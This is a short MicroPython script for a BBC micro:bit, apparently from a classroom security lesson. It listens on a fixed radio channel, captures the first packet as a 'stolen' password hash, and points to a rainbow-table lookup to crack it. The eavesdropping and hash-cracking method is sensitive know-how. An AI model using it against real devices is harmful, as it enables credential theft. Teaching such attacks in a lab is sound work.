from microbit import *
from mb_radio import *
from mb_file import *
from rbt_5 import *
stolen_hash=""
radio.on()
radio.config(length=250, channel=12,power=6,group=1)
disp_clr()
print("Man-in-the-middle attacking...")
while not escape():
  stolen_hash = radio.receive()
  if stolen_hash!= None:
     break
print("Hash:", stolen_hash, "\nstolen")
# Type >>>rbt[stolen_hash] in shell
# to look up the stolen hash.